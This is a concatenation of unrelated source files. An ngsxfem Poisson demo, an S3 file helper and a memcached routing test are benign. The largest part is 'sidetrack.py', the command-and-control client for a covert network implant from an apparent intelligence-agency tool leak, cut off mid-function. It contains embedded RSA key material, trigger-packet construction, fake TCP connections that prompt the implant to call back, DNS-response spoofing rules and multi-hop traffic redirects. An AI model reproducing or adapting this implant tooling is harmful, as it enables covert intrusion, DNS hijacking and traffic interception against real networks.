demos/fictdom_mlset.py
|
1
|
4537
|
"""
In this example we solve an unfitted Poisson problem similar to the one in
`fictdom.py`, however this time with the unfitted geometry being the
unit square. This example shall illustrate the functionality of ngsxfem to
solve PDE problems on geometries described via multiple level set functions.
PDE problem + Discretisation + Geometry + Implementation aspects:
-----------------------------------------------------------------
* As in fictdom.py except for the different geometry and its handling.
Used Features:
--------------
* Quadrature with respect to multiple level set functions; see the
'mlset_pde' jupyter tutorial.
* MultiLevelsetCutInfo, see the 'mlset_basic' jupyter tutorial.
* DomainTypeArray convenience layer, see the 'mlset_basic' jupyter
tutorial.
* Restricted BilinearForm, jupyter tutorial `basics`.
* Cut Differential Symbols, jupyter tutorials `intlset` and `cutfem`.
"""
# ------------------------------ LOAD LIBRARIES -------------------------------
from netgen.geom2d import SplineGeometry
from ngsolve import *
from xfem import *
from xfem.mlset import *
ngsglobals.msg_level = 2
# -------------------------------- PARAMETERS ---------------------------------
# Domain corners
ll, ur = (-0.2, -0.2), (1.2, 1.2)
# Initial mesh diameter
initial_maxh = 0.4
# Number of mesh bisections
nref = 3
# Order of finite element space
k = 1
# Stabilization parameter for ghost-penalty
gamma_s = 0.5
# Stabilization parameter for Nitsche
gamma_n = 10
# ----------------------------------- MAIN ------------------------------------
# Set up the level sets, exact solution and right-hand side
def level_sets():
return [-y, x - 1, y - 1, -x]
nr_ls = len(level_sets())
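# Each level set in level_sets() is negative inside the unit square, so the
# square is exactly the region with domain type (NEG, NEG, NEG, NEG).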
u_ex = 16 * x * (1 - x) * y * (1 - y)
grad_u_ex = (u_ex.Diff(x).Compile(), u_ex.Diff(y).Compile())
rhs = -(u_ex.Diff(x).Diff(x) + u_ex.Diff(y).Diff(y)).Compile()
# Geometry and mesh
geo = SplineGeometry()
geo.AddRectangle(ll, ur, bcs=("bottom", "right", "top", "left"))
ngmesh = geo.GenerateMesh(maxh=initial_maxh)
for i in range(nref):
ngmesh.Refine()
mesh = Mesh(ngmesh)
# Level set and cut-information
P1 = H1(mesh, order=1)
lsetsp1 = tuple(GridFunction(P1) for i in range(nr_ls))
for i, lsetp1 in enumerate(lsetsp1):
InterpolateToP1(level_sets()[i], lsetp1)
Draw(lsetp1, mesh, "lsetp1_{}".format(i))
square = DomainTypeArray((NEG, NEG, NEG, NEG))
with TaskManager():
square.Compress(lsetsp1)
boundary = square.Boundary()
boundary.Compress(lsetsp1)
mlci = MultiLevelsetCutInfo(mesh, lsetsp1)
# Element and degrees-of-freedom markers
els_if_singe = {dtt: BitArray(mesh.ne) for dtt in boundary}
facets_gp = BitArray(mesh.nedge)
hasneg = mlci.GetElementsWithContribution(square)
# Finite element space
Vhbase = H1(mesh, order=k, dgjumps=True)
Vh = Restrict(Vhbase, hasneg)
gfu = GridFunction(Vh)
hasif = mlci.GetElementsWithContribution(boundary)
Draw(BitArrayCF(hasif), mesh, "hasif")
for i, (dtt, els_bnd) in enumerate(els_if_singe.items()):
els_bnd[:] = mlci.GetElementsWithContribution(dtt)
Draw(BitArrayCF(els_bnd), mesh, "els_if_singe" + str(i))
facets_gp = GetFacetsWithNeighborTypes(mesh, a=hasneg, b=hasif,
use_and=True)
els_gp = GetElementsWithNeighborFacets(mesh, facets_gp)
Draw(BitArrayCF(els_gp), mesh, "gp_elements")
# Bilinear and linear forms of the weak formulation
u, v = Vh.TnT()
h = specialcf.mesh_size
normals = square.GetOuterNormals(lsetsp1)
# Set up the integrator symbols
dx = dCut(lsetsp1, square, definedonelements=hasneg)
ds = {dtt: dCut(lsetsp1, dtt, definedonelements=els_if_singe[dtt])
for dtt in boundary}
dw = dFacetPatch(definedonelements=facets_gp)
# Construct integrator
a = RestrictedBilinearForm(Vh, facet_restriction=facets_gp, check_unused=False)
a += InnerProduct(grad(u), grad(v)) * dx
for bnd, n in normals.items():
a += -InnerProduct(grad(u) * n, v) * ds[bnd]
a += -InnerProduct(grad(v) * n, u) * ds[bnd]
a += (gamma_n * k * k / h) * InnerProduct(u, v) * ds[bnd]
a += gamma_s / (h**2) * (u - u.Other()) * (v - v.Other()) * dw
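# The dFacetPatch term is the ghost-penalty stabilisation acting on the
# facet patches marked in facets_gp; it keeps the system well-conditioned
# regardless of how the elements are cut.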
f = LinearForm(Vh)
f += rhs * v * dx
# Assemble and solve the linear system
f.Assemble()
a.Assemble()
gfu.vec.data = a.mat.Inverse(Vh.FreeDofs()) * f.vec
Draw(gfu, mesh, "uh")
# Post-processing
err_l2 = sqrt(Integrate((gfu - u_ex)**2 * dx.order(2 * k), mesh))
err_h1 = sqrt(Integrate((Grad(gfu) - grad_u_ex)**2 * dx.order(2 * (k - 1)),
mesh))
print("L2 error = {:1.5e}".format(err_l2), "H1 error = {:1.5e}".format(err_h1))
|
lgpl-3.0
| 2,544,864,473,202,585,000
| 29.655405
| 79
| 0.648446
| false
| 2.857053
| false
| false
| false
|
selassid/canopener
|
canopener/s3file.py
|
1
|
1324
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
import tempfile
from boto.s3.connection import S3Connection
def make_s3_connection(aws_access_key_id=None, aws_secret_access_key=None):
"""Mockable point for creating S3Connections."""
return S3Connection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
class s3file(object):
def __new__(
cls,
filename,
mode='r',
aws_access_key_id=None,
aws_secret_access_key=None,
):
"""Opens a local copy of an S3 URL."""
parse = urlparse(filename)
if 'w' in mode:
raise ValueError("can't write to S3")
if parse.scheme != 's3':
raise ValueError("s3file can't open non-S3 URLs")
conn = make_s3_connection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
bucket = conn.get_bucket(parse.netloc)
key = bucket.get_key(parse.path)
local_file = tempfile.TemporaryFile()
key.get_contents_to_file(local_file)
local_file.seek(0)
return local_file
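# --- Editor's illustrative sketch, not part of the original module; the
# --- bucket, key, and credentials below are hypothetical placeholders.
if __name__ == '__main__':
    local_copy = s3file(
        's3://example-bucket/path/to/key.txt',
        aws_access_key_id='AKIA...',
        aws_secret_access_key='...',
    )
    print(local_copy.read())  # the returned object is a plain temporary file
    local_copy.close()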
|
bsd-2-clause
| -4,765,795,732,312,073,000
| 26.583333
| 75
| 0.616314
| false
| 3.568733
| false
| false
| false
|
hankshz/dockers
|
memcached/script/test-memcached.py
|
1
|
1304
|
#!/usr/bin/env python3
import time
from pymemcache.client.base import Client
master = Client(('memcached-master', 11211))
slave1 = Client(('memcached-slave1', 11211))
slave2 = Client(('memcached-slave2', 11211))
slave3 = Client(('memcached-slave3', 11211))
# Invalidate all
# mcrouter does not seem to work properly with pymemcache's flush_all
slave1.flush_all()
slave2.flush_all()
slave3.flush_all()
# Set & Get from the master
master.set('a', '1')
assert(master.get('a') == b'1')
master.set('b', '2')
assert(master.get('b') == b'2')
master.set('c', '3')
assert(master.get('c') == b'3')
master.set('d', '4')
assert(master.get('d') == b'4')
# Get from slave1; only keys starting with 'a' are routed here
slave1 = Client(('memcached-slave1', 11211))
assert(slave1.get('a') == b'1')
assert(slave1.get('b') == None)
assert(slave1.get('c') == None)
assert(slave1.get('d') == None)
# Get from slave2; only keys starting with 'b' are routed here
slave2 = Client(('memcached-slave2', 11211))
assert(slave2.get('a') == None)
assert(slave2.get('b') == b'2')
assert(slave2.get('c') == None)
assert(slave2.get('d') == None)
# Get from slave3; all remaining keys are routed here
slave3 = Client(('memcached-slave3', 11211))
assert(slave3.get('a') == None)
assert(slave3.get('b') == None)
assert(slave3.get('c') == b'3')
assert(slave3.get('d') == b'4')
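# Editor's note: the assertions above encode the assumed mcrouter routing
# policy (keys starting with 'a' -> slave1, 'b' -> slave2, rest -> slave3).
# The same checks restated table-driven:
expected = {'a': (b'1', slave1), 'b': (b'2', slave2),
            'c': (b'3', slave3), 'd': (b'4', slave3)}
for key, (value, owner) in sorted(expected.items()):
    assert owner.get(key) == value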
|
apache-2.0
| -5,473,104,553,618,401,000
| 27.347826
| 60
| 0.663344
| false
| 2.728033
| false
| true
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/sidetrack.py
|
1
|
72163
|
import base
import crypto
import echocmd
import string
import struct
import time
import re
import os
import sys
from socket import *
import rawtcp
import types
class SIDECMD(echocmd.ECHOCMD):
def __init__(self):
echocmd.ECHOCMD.__init__(self)
def TypeConvert(self, stype):
#print "In TypeConvert %d" % (stype)
if type(stype) != type(''):
if stype == 1:
stype = "A"
elif stype == 2:
stype = "NS"
elif stype == 3:
stype = "MD"
elif stype == 4:
stype = "MF"
elif stype == 5:
stype = "CNAME"
elif stype == 6:
stype = "SOA"
elif stype == 7:
stype = "MB"
elif stype == 8:
stype = "MG"
elif stype == 9:
stype = "MR"
elif stype == 10:
stype = "NULL"
elif stype == 11:
stype = "WKS"
elif stype == 12:
stype = "PTR"
elif stype == 13:
stype = "HINFO"
elif stype == 14:
stype = "MINFO"
elif stype == 15:
stype = "MX"
elif stype == 16:
stype = "TXT"
elif stype == 252:
stype = "AXFR"
elif stype == 253:
stype = "MAILB"
elif stype == 254:
stype = "MAILA"
elif stype == 255:
stype = "*"
return stype
def ConvertType(self, rtype):
if type(rtype) != type(0):
rtype = string.upper(rtype)
if rtype == "A":
rtype = 1
elif rtype == "NS":
rtype = 2
elif rtype == "MD":
rtype = 3
elif rtype == "MF":
rtype = 4
elif rtype == "CNAME":
rtype = 5
elif rtype == "SOA":
rtype = 6
elif rtype == "MB":
rtype = 7
elif rtype == "MG":
rtype = 8
elif rtype == "MR":
rtype = 9
elif rtype == "NULL":
rtype = 10
elif rtype == "WKS":
rtype = 11
elif rtype == "PTR":
rtype = 12
elif rtype == "HINFO":
rtype = 13
elif rtype == "MINFO":
rtype = 14
elif rtype == "MX":
rtype = 15
elif rtype == "TXT":
rtype = 16
elif rtype == "AXFR":
rtype = 252
elif rtype == "MAILB":
rtype = 253
elif rtype == "MAILA":
rtype = 254
elif rtype == "*":
rtype = 255
return rtype
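    # Editor's sketch (not original code): the paired elif chains above are a
    # fixed bidirectional table; the same mapping could be written once as a
    # dict and inverted, e.g.
    #
    #     DNS_TYPES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR",
    #                  15: "MX", 16: "TXT", 255: "*"}   # abbreviated
    #     DNS_TYPES_REV = dict((v, k) for k, v in DNS_TYPES.items())
    #
    # keeping TypeConvert/ConvertType as thin lookups with a fallthrough.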
def ClassConvert(self, rclass):
#print "In ClassConvert %d" % (rclass)
if type(rclass) != type(''):
if rclass == 1:
rclass = "IN"
elif rclass == 2:
rclass = "CS"
elif rclass == 3:
rclass = "CH"
elif rclass == 4:
rclass = "HS"
return rclass
def ConvertClass(self, rclass):
if type(rclass) != type(0):
rclass = string.upper(rclass)
if rclass == "IN":
rclass = 1
elif rclass == "CS":
rclass = 2
elif rclass == "CH":
rclass = 3
elif rclass == "HS":
rclass = 4
return rclass
def ConvertFlags(self, flags):
        # DNS header flag word (qr/rd/ra bits); RA = 0x0080, AA = 0x0400
retFlags = 0
if type(flags) != type(0):
flags = string.upper(flags)
if flags == "RA":
retFlags = retFlags | 0x0080L
if flags == "AA":
retFlags = retFlags | 0x0400L
return retFlags
def SectionConvert(self,section):
if type(section) != type(''):
if section == 0:
section = "query"
elif section == 1:
section = "ans"
elif section == 2:
section = "auth"
elif section == 3:
section = "add"
return section
def ConvertSection(self,section):
if type(section) != type(0):
section = string.upper(section)
if section[:1] == "Q":
section = 0
elif section[:2] == "AN":
section = 1
elif section[:2] == "AU":
section = 2
elif section[:2] == "AD":
section = 3
return section
def NameConvertName(self, name):
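        # DNS names are length-prefixed labels terminated by a zero byte,
        # e.g. "\x03www\x07example\x03com\x00"; this walks the labels,
        # rebuilds the dotted form, and raises TypeError on non-printable
        # bytes.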
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0]
if val >= 32 and val < 127:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.HexConvert(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.HexConvert(name, padding)
def ConvertName(self, name):
ret = ''
regExpr = re.compile("^[a-zA-Z0-9-_.]*$")
if type(name) != type(0x0L):
reg = regExpr.search(name)
if reg != None:
dots = string.splitfields(name,".")
for i in range(len(dots)):
ret = ret + chr(len(dots[i])) + dots[i]
ret = ret + '\000'
return ret
else:
return name
else:
return struct.pack("!H",name)
def FlagConvert(self, flag):
if flag == 0:
return "Ignore"
elif flag == 1:
return "Count"
elif flag == 2:
return "Active"
def HexConvert(self,data,pad=0):
ret = ''
padding = ''
for i in range(pad):
padding = padding + ' '
for i in range(len(data)):
if i % 16 == 0 and i != 0:
ret = ret + '\n' + padding
myNum = struct.unpack("!H", '\000'+data[i:i+1])[0]
ret = ret + "%02x " % myNum
ret = ret + '\n' + padding + "(%d)" % (len(data))
return ret
class SIDETRACK(base.Implant):
def __init__(self, session, proto):
base.Implant.__init__(self, session, proto)
self.name = 'SIDETRACK'
self.newCV = None
self.targetopts = self.session.target.GetImplantOpts('sidetrack')
self.version = self.targetopts['VERSION']
if self.version >= 2.0:
self.cipher = crypto.rc6()
else:
self.cipher = crypto.rc5()
self.cipher.SetKey(self.targetopts['KEY'])
self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL
self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L
self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L
self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L
self.packetSize = 450
self.timediff = self.session.target.timediff
self.localRedir = None
self.parent = None
self.children = []
self.rules = []
def RegisterCommands(self):
self.AddCommand('ping', echocmd.ECHOCMD_PING)
self.AddCommand('status', echocmd.ECHOCMD_STATUS)
self.AddCommand('done', echocmd.ECHOCMD_DONE)
self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE)
self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF)
self.AddCommand('incision', echocmd.ECHOCMD_INCISION)
self.AddCommand('rekey', echocmd.ECHOCMD_REKEY)
self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY)
self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY)
self.AddCommand('key', echocmd.ECHOCMD_KEY)
self.AddCommand('init', SIDECMD_INIT)
self.AddCommand('dnsadd', SIDECMD_DNSADD)
self.AddCommand('dnsrm', SIDECMD_DNSREMOVE)
self.AddCommand('dnsset', SIDECMD_DNSSET)
self.AddCommand('dnsaction', SIDECMD_DNSACTION)
self.AddCommand('dnsraw', SIDECMD_DNSRAW)
self.AddCommand('dnslist', SIDECMD_DNSLIST)
self.AddCommand('dnsload', SIDECMD_DNSLOAD)
self.AddCommand('dnssave', SIDECMD_DNSSAVE)
self.AddCommand('rediradd', SIDECMD_REDIRADD)
self.AddCommand('redirlist', SIDECMD_REDIRLIST)
self.AddCommand('redirset', SIDECMD_REDIRSET)
self.AddCommand('redirrm', SIDECMD_REDIRREMOVE)
self.AddCommand('connlist', SIDECMD_CONNLIST)
self.AddCommand('connrm', SIDECMD_CONNREMOVE)
self.AddCommand('stunload', SIDECMD_UNLOAD)
self.AddCommand('connect', SIDECMD_CONNECT)
self.AddCommand('cclist', SIDECMD_CCLIST)
self.AddCommand('ccremove', SIDECMD_CCREMOVE)
self.AddCommand('multiaddr', SIDECMD_MULTIADDR)
##########################################################################
# MULTIADDR class
#########################################################################
class SIDECMD_MULTIADDR(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "multiaddr"
self.usage = "multiaddr <0|1>"
self.info = "Let pyside know that the target has multiple addresses"
def run(self, value=1):
self.implant.session.target.hasAnotherAddress = value
return (1, "Value updated")
##########################################################################
# CONNECT class
#########################################################################
class SIDECMD_CONNECT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connect"
self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>"
self.info = "Connect to SIDETRACK"
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
raise ValueError, host
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
raise ValueError, ports[0]
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
raise ValueError, ports[1]
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
# host references a session
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,hostinfo,fport):
# Parse the ports
prevRule = None
tempRule = None
localRedir = None
host,laddr,lport,cbport = self.parseHostInfo(hostinfo)
if fport == 0:
PORT = 500
#open the listener
try:
sock = socket(AF_INET,SOCK_STREAM,0)
sock.bind(('',lport))
sock.listen(2)
except error, message:
return (0, "Could not open port %d %s" % (lport,message))
# See if the user entered another host
if host != None:
self.implant.parent = host
#hpn is the hop prior to host (might just be "me")
hpn = host.implant.parent.name
myname = host.name
hostinfo = re.sub(myname,hpn,hostinfo)
# Testing
localRedir = REDIRECT(self,0,10800,10800,6,\
self.ConvertIP(self.implant.session.target.ip), \
self.ConvertIP(self.implant.session.target.ip),
0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0)
localRedir.add(0)
self.implant.session.localRedir = localRedir
# Add a redirect (on the previous host) for this connection
cmd = host.GetCommand('rediradd')
base.ccSupport = 1
res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h")
base.ccSupport = 0
if res[0] == 0:
return res
# Let the previous implant know this redirect rule is in support
# of a command and control connection
prevRule = cmd.redir
if prevRule != None:
prevRule.ccPassthru = self.implant.session
# Add a temporary rule to allow the trigger to be passed to target
base.ccSupport = 1
if fport == 0:
res = cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix")
else:
res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix")
base.ccSupport = 0
base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff))
if res[0] == 0:
if prevRule != None:
prevRule.remove()
return (0, "Unable to establish redir for port %d: %s"%(fport,res[1]))
tempRule = cmd.redir
else:
localRedir = None
prevRule = None
self.implant.session.localRedir = None
#add the rule
if tempRule == None or (tempRule != None and \
cmd.implant.session.target.hasAnotherAddress == 0):
rule = base.redir.listen(laddr,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
else:
rule = base.redir.listen(tempRule.ST_ip,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
#Make the connection
if fport == 0:
conn = socket(AF_INET,SOCK_DGRAM,0)
conn.bind(('',PORT))
conn.connect((self.implant.session.target.ip,PORT))
f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null")
d = f.read()
f = None
data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \
d[16:20] + struct.pack("!L", 0x154) + d[20:332]
conn.send(data)
conn.close()
#accept
self.implant.protocol.sock,addr = sock.accept()
else:
#conn = socket(AF_INET,SOCK_STREAM,0)
# STUB: Catch this in a try statement
try:
# esev - 6/24/03
#conn.connect((self.implant.session.target.ip,fport))
#conn.close()
#conn = None
rawtcp.sendFakeConnection(self.implant.session.target.ip,fport)
# STUB: Put a timeout here
#accept
self.implant.protocol.sock,addr = sock.accept()
except:
base.redir.delete(rule)
sock.close()
sock = None
#if conn != None:
# conn.close()
if localRedir != None:
localRedir.remove()
if prevRule != None:
prevRule.remove()
if tempRule != None:
tempRule.remove()
base.sessionDict[self.implant.session.name] = None
return (1,"Canceled by user, target %s removed" % self.implant.session.name)
sock.close()
sock = None
# Set the CC redirect to inactive. This will not effect the
# current connection..only prevent the rule from getting in the way
if prevRule != None:
prevRule.set(0)
#if there is a connection back return 1 else 0
if self.implant.protocol.sock:
cmd = self.implant.session.GetCommand("init")
res = cmd.run()
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1, "Connected")
else:
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
return (0, "Could not connect")
##########################################################################
# INIT class
# op code: 0x20
#########################################################################
class SIDECMD_INIT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "init"
self.usage = "init"
self.info = "Initialize the implant"
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
cmd = self.implant.session.GetCommand("ping")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
for i in range(3):
cmd = self.implant.session.GetCommand("rekey")
res = cmd.run()
if res[0] != 0:
break
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("switchkey")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("status")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1,"Initialization complete")
##########################################################################
# DNSLOAD class
#########################################################################
class SIDECMD_DNSLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsload"
self.usage = "dnsload <filename>"
self.info = "Send DNS data from a file to the target"
#-------------------------------------------------------------------------
# Name : ProcessArg
# Purpose: Tests to see if the argument is a string or number
# Receive: arg - The argument to test
# Return : The original string if a number, or a quoted string if not
#-------------------------------------------------------------------------
def ProcessArg(self,arg):
if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \
re.match('^0x[0-9a-fA-F]+L?', arg) != None):
return arg
else:
return '"' + arg + '"'
def runRule(self, args):
cmd = SIDECMD_DNSADD()
cmd.implant = self.implant
argString = 'myRes = cmd.run('
for i in range(1,len(args)):
if i == 1:
argString = argString + self.ProcessArg(args[i])
else:
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
if myRes and myRes[0]:
self.lastRule = myRes[0]
def runSet(self, args):
cmd = SIDECMD_DNSSET()
cmd.implant = self.implant
argString = 'myRes = cmd.run(self.lastRule'
for i in range(1,len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def runCmd(self, args):
cmd = SIDECMD_DNSACTION()
cmd.implant = self.implant
argString = 'tmp = cmd.run(self.lastRule'
for i in range(len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def run(self, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
file = open(filename,'r')
self.lastRule = 0
while 1:
line = file.readline()
if not line:
line = None
return (1, "Input from file complete")
args = base.SplitCommandString(string.strip(line))
if len(args) == 0:
continue
elif args[0][0:1] == '#' or args[0] == '':
continue
elif args[0] == "rule":
self.runRule(args)
print "Rule %d added\n" % (self.lastRule)
elif args[0] == "set":
self.runSet(args)
else:
self.runCmd(args)
return (0, "problem")
##########################################################################
# DNSADD class
# op code: 0x18
#########################################################################
class SIDECMD_DNSADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsadd"
self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]"
self.info = "Add a DNS entry into sidetrack (see also dnsset)"
self.op = 0x18L
def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
ipStr = self.ConvertIP(ip)
maskStr = self.ConvertIP(mask)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
name = self.ConvertName(name)
length = self.ConvertTime(length)
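        # Wire layout (editor's annotation): 4-byte source IP, 4-byte mask,
        # then !LHHHH = longevity, DNS flags, type, class, name length,
        # followed by the label-encoded name itself.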
self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\
rtype,rclass,len(name)) +name
self.Query()
if( self.op == 0x18L and self.res == 0x1L ):
dnsRes = struct.unpack("!l",self.data[0:4])[0]
return (dnsRes, "Add successful, rule number: %d" % dnsRes)
else:
return (0, "Add failed")
##########################################################################
# DNSREMOVE class
# op code: 0x19
#########################################################################
class SIDECMD_DNSREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsrm"
self.usage = "dnsrm <rule|all>"
self.info = "Remove a dns rule"
self.op = 0x19L
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!l",rule)
self.Query()
if self.op == 0x19L and self.res == 0x01L:
return (1,"Rule(s) removed")
else:
return (0,"unable to remove rule(s)")
##########################################################################
# DNSSET class
# op code: 0x20
#########################################################################
class SIDECMD_DNSSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsset"
self.usage = "dnsset <rule> <ignore|count|active>"
self.info = "Turn a DNS rule on or off"
self.op = 0x20L
def run(self,rule,onoff):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.data = struct.pack("!l",rule)
if onoff[0:1] == "a" or onoff[0:1] == "A":
self.data = self.data + struct.pack("!h", 2)
elif onoff[0:1] == "c" or onoff[0:1] == "C":
self.data = self.data + struct.pack("!h", 1)
else:
self.data = self.data + struct.pack("!h", 0)
self.Query()
if self.op == 0x20L and self.res == 0x01L:
return (1,"rule %d successfully set to %s" %\
(rule, onoff))
else:
return (0,"unable to set rule to %s" % onoff)
##########################################################################
# DNSRAW class
# op code: 0x21
#########################################################################
class SIDECMD_DNSRAW(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsraw"
self.info = "Upload a binary dns response packet"
self.usage = "dnsraw <rule> <filename>"
self.op = 0x21L
def run(self, rule, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0, msg)
file = open(filename,'r')
file.seek(0,2)
filesize = file.tell()
file.seek(0,0)
maxchunksize = self.implant.packetSize - 34
numchunks = filesize / maxchunksize
if filesize%maxchunksize > 0:
numchunks = numchunks + 1
for i in range(numchunks):
self.data = file.read(maxchunksize)
self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\
len(self.data)) + self.data
self.Query()
if (self.op != 0x21L or self.res != 0x1L):
return (0,"Binary upload failed at chunk %d"%(i+1))
return (1,"Binary upload of %d chunks successful"%(numchunks))
##########################################################################
# DNSACTION class
# op code: 0x21
#########################################################################
class SIDECMD_DNSACTION(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsaction"
self.info = "Set the action for a rule"
self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>"
self.op = 0x21L
def run(self,rule,sect,name,rtype,rclass,ttl,data):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
name = self.ConvertName(name)
sect = self.ConvertSection(sect)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
ttl = self.ConvertTime(ttl)
if rtype == 1:
data = self.ConvertIP(data)
else:
data = self.ConvertName(data)
self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\
rclass,\
len(name),\
len(data))+\
name+data
self.Query()
if self.op == 0x21L and self.res == 0x01L:
return (1,"%s action for rule %d set successfully" % \
(sect, rule))
else:
return (0,"Could not set action")
##########################################################################
# DNSLIST class
# op code: 0x22
#########################################################################
class SIDECMD_DNSLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnslist"
self.usage = "dnslist [-v] [rule] [section]"
self.info = "Retrieve a section of a rule from SIDETRACK"
self.op = 0x22L
def ParseReturn(self):
if self.implant.version < 2.0:
self.lastport = 0
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \
self.dnsflags, self.rtype, self.rclass, self.rsec, \
